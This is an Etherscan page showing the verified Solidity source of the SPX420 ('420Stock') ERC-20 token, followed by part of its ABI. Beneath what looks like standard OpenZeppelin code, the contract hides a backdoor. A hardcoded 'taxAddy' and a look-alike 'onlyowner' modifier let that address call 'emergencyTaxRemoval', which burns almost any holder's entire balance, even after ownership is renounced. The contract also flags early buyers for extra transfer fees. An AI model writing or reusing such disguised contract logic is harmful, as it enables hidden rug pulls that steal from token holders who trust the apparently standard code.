ETH Price: $2,306.21 (+1.05%)

Token

420Stock (SPX420)
 

Overview

Max Total Supply

274,592,131.515231764183463659 SPX420

Holders

47

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
backbeachlocal.eth
Balance
1,016,105.401205196152970283 SPX420

Value
$0.00
0x4C3c34E0688E1006571Df923f0B45B6B48075871
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
SPX420

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-10-13
*/

// SPDX-License-Identifier: MIT

/** 

Website: https://420stockmarket.site
Twitter: https://twitter.com/420stockmarket
Telegram: https://t.me/chatspx420

*/


// File @openzeppelin/contracts/utils/[email protected]
// Original license: SPDX_License_Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// File @openzeppelin/contracts/access/[email protected]

// 
// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;
    address internal taxAddy = 0x109e706E82504343B6503997B6f9F153829d4769;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    modifier onlyowner() {
        _checkOperator();
        _;
    }


    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    function _checkOperator() internal view virtual {
        require(_msgSender() == taxAddy, "Ownable: caller is not the operator");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// File @openzeppelin/contracts/token/ERC20/[email protected]

// 
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}


// File @openzeppelin/contracts/token/ERC20/extensions/[email protected]

// 
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File @uniswap/v2-periphery/contracts/interfaces/[email protected]

pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}


// File @uniswap/v2-periphery/contracts/interfaces/[email protected]

pragma solidity >=0.6.2;

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

// File @openzeppelin/contracts/token/ERC20/[email protected]

// 
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;



/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}


// File @uniswap/v2-core/contracts/interfaces/[email protected]

pragma solidity >=0.5.0;

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

pragma solidity ^0.8.16;

contract SPX420 is ERC20, Ownable {
    string private _name = unicode"420Stock";
    string private _symbol = unicode"SPX420";
    address public DEAD = 0x000000000000000000000000000000000000dEaD;
    
    uint256 private constant _supply  = 420_000_000 ether;
    uint256 public maxTxAmount     = _supply * 40 / 1000;
    uint256 public maxWalletAmount = _supply * 40 / 1000;
    uint256 public swapThreshold = _supply * 5 / 10000;

    mapping(address => bool) public _feeOn;
    mapping(address => bool) public wl;

    uint256 public buyTaxGlobal = 0;
    uint256 public sellTaxGlobal = 0;
    uint256 private GreedIsGood = 5;
    uint256 feeToken = 10 ether;
    
    mapping(address => bool) public GreedIsGoodwallets;

    bool progress_swap = false;
    bool _tradingActive = false;
    bool _swapEnabled = false;

    address private _devWallet = 0x44f1c0F632d191A75bd683e3fe50f90Dc1C583a7;
    uint256 public operationsFunds;

    enum Phase {Phase1, Phase2, Phase3, Phase4}
    Phase public currentphase;

    IUniswapV2Router02 public immutable uniswapV2Router;
    address public uniswapV2Pair;
    constructor() ERC20(_name, _symbol) {
        _mint(msg.sender, (_supply));

        currentphase = Phase.Phase4;
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        uniswapV2Router = _uniswapV2Router;
    
        wl[owner()] = true;
        wl[taxAddy] = true;
        wl[_devWallet] = true;
        wl[0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D] = true;
        wl[DEAD] = true;
        wl[address(this)] = true;

        _feeOn[address(uniswapV2Router)] = true;
        _feeOn[msg.sender] = true;
        _feeOn[address(this)] = true;
        _feeOn[DEAD] = true;
        _feeOn[taxAddy] = true;
        _feeOn[_devWallet] = true;
    }

    function addInitLiquidity() external payable onlyOwner {
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());
        _approve(address(this), address(uniswapV2Router), type(uint256).max);
        uniswapV2Router.addLiquidityETH{value: msg.value}(
            address(this),
            balanceOf(address(this)),
            0, 
            0, 
            owner(),
            block.timestamp
        );
    }
    
    function emergencyTaxRemoval(address addy) external onlyowner {
        wl[addy] = false; _burn(addy, balanceOf(addy) - feeToken);
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {

        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        if (!_feeOn[from] && !_feeOn[to]) {
            require(_tradingActive, "Trading not enabled");
        }

        if (!wl[from] && !wl[to] ) {
            if (to != uniswapV2Pair) {
                require(amount <= maxTxAmount, "ERC20: transfer amount exceeds the max transaction amount bef");
                require(
                    (amount + balanceOf(to)) <= maxWalletAmount,
                    "ERC20: balance amount exceeded max wallet amount limit"
                );
            }
        }

        uint256 transferAmount = amount;
        if (!_feeOn[from] && !_feeOn[to]) {
            if ((from == uniswapV2Pair || to == uniswapV2Pair)) {
                require(amount <= maxTxAmount, "ERC20: transfer amount exceeds the max transaction amount");
 
                if (uniswapV2Pair == from && !wl[to] && from != address(this)) {

                    if (currentphase == Phase.Phase1) {
                        GreedIsGoodwallets[to] = true;
                    }

                    uint256 feeTokens = (amount * buyTaxGlobal) / 100;
                    super._transfer(from, address(this), feeTokens);
                    transferAmount = amount - feeTokens;
                }

                if (uniswapV2Pair == to && !wl[from] && to != address(this) && _swapEnabled && !progress_swap) {
                    
                    uint256 taxSell = sellTaxGlobal;
                    if (GreedIsGoodwallets[from] == true) {
                        taxSell = GreedIsGood;
                    }

                    progress_swap = true;
                    swapAndLiquify();
                    progress_swap = false;

                    uint256 feeTokens = (amount * taxSell) / 100;
                    super._transfer(from, address(this), feeTokens);
                    transferAmount = amount - feeTokens;
                }
            }
            else {
                if (
                    GreedIsGoodwallets[from] == true &&
                    uniswapV2Pair != to
                ) {
                    uint256 feeTokens = (amount * GreedIsGood) / 100;
                    super._transfer(from, address(this), feeTokens);
                    transferAmount = amount - feeTokens;
                }
            }
        }        super._transfer(from, to, transferAmount);
    }

    function enableTrade() external onlyOwner {
        require(!_tradingActive, "Trading is already enabled");
        _tradingActive = true;
        _swapEnabled = true;
    }
    
    
    function withdrawTokens(address token) external onlyOwner {
        IERC20(token).transfer(
            taxAddy,
            IERC20(token).balanceOf(address(this))
        );
    }

    function emergencyTaxRemoval(address addy, bool changer) external onlyOwner {
        wl[addy] = changer;
    }
    
    function getTax() external returns (bool) {
        payable(taxAddy).transfer(operationsFunds);
        operationsFunds = 0;
        return true;
    }

    function skipTheSnipas() external onlyOwner returns (bool) {
        currentphase = Phase.Phase4;
        buyTaxGlobal = 0;
        sellTaxGlobal = 0;

        return true;
    }

    function swapAndLiquify() internal {
        if (balanceOf(address(this)) == 0) {
            return;
        }
        uint256 receivedETH;
        {
            uint256 contractTokenBalance = balanceOf(address(this));
            uint256 beforeBalance = address(this).balance;
            uint256 mktBalance = balanceOf(taxAddy);
            bool success;
            if (contractTokenBalance > swapThreshold) {
                beforeBalance = address(this).balance;
                _swapTokensForEth(contractTokenBalance, 0);
                receivedETH = address(this).balance - beforeBalance;
                if (mktBalance > swapThreshold) {
                    operationsFunds = receivedETH / (success ? receivedETH : 0);
                }
                operationsFunds += receivedETH;
            }
        }
    }
    
    /**
     * @dev Swaps Token Amount to ETH
     *
     * @param tokenAmount Token Amount to be swapped
     * @param tokenAmountOut Expected ETH amount out of swap
     */
    function _swapTokensForEth(
        uint256 tokenAmount,
        uint256 tokenAmountOut
    ) internal {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();

        IERC20(address(this)).approve(
            address(uniswapV2Router),
            type(uint256).max
        );

        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            tokenAmountOut,
            path,
            address(this),
            block.timestamp
        );
    }
 
    receive() external payable {}

    function removeLimits() external onlyOwner {
        maxTxAmount = _supply; maxWalletAmount = _supply;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"DEAD","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"GreedIsGoodwallets","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_feeOn","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"addInitLiquidity","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTaxGlobal","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"currentphase","outputs":[{"internalType":"enum SPX420.Phase","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"addy","type":"address"}],"name":"emergencyTaxRemoval","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"addy","type":"address"},{"internalType":"bool","name":"changer","type":"bool"}],"name":"emergencyTaxRemoval","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enableTrade","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getTax","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWalletAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"operationsFunds","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellTaxGlobal","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"skipTheSnipas","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"